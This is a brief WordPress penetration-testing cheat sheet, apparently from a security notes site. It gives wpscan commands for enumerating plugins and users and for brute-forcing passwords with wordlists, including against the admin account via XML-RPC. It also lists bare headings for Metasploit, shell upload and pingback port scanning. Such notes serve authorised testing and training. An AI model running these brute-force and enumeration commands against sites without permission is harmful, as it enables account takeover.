๐ดwordpress pentesting
Wordpress Pentesting
Enumeration
Wpscan
# Help menu
wpscan -h
# Non intrusive scan
wpscan --url <target-url>
# Plugins enumeration
wpscan --url www.example.com --enumerate p
# Users enumeration
wpscan --url www.example.com --enumerate uBrute Force Attack
# Bruteforce users found using 50 threads
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50
# Bruteforce on one user
wpscan --url www.example.com --wordlist darkc0de.lst --username admin
# Xmlrpc attack
wpscan --password-attack xmlrpc -U admin -P <password-wordlist> --url <target-url> Metasploit
xmlrpc
Shell Upload
XML-RPC Attack
xmlrpc.php
Send a POST request and list all the available methods
Bruteforce login
XSPA or simply port scanning
pingback.ping
References
Last updated
Was this helpful?